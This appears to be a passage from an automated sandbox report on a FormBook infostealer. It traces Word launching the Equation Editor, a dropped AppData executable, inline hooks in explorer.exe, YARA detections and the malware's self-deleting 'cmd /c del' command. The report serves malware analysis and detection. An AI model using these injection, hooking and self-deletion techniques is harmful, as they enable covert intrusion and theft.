                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE8
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE8
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x84 0x4E 0xE8
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8C 0xCE 0xE8

                                                          Statistics

                                                          Behavior


System Behavior

General

Start time: 14:25:14
Start date: 27/09/2021
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase: 0x13f030000
File size: 1423704 bytes
MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 14:25:15
Start date: 27/09/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 14:25:17
Start date: 27/09/2021
Path: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Imagebase: 0x13a0000
File size: 863744 bytes
MD5 hash: 7572FBC5DE30359E833D6F382DB286FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 13%, ReversingLabs
Reputation: low

General

Start time: 14:25:20
Start date: 27/09/2021
Path: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Imagebase: 0x13a0000
File size: 863744 bytes
MD5 hash: 7572FBC5DE30359E833D6F382DB286FA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 14:25:21
Start date: 27/09/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0xffa10000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 14:25:35
Start date: 27/09/2021
Path: C:\Windows\SysWOW64\wininit.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\wininit.exe
Imagebase: 0x5b0000
File size: 96256 bytes
MD5 hash: B5C5DCAD3899512020D135600129D665
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate

                                                          General

                                                          Start time:14:25:39
                                                          Start date:27/09/2021
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:/c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe'
                                                          Imagebase:0x4a810000
                                                          File size:302592 bytes
                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

Disassembly

Code Analysis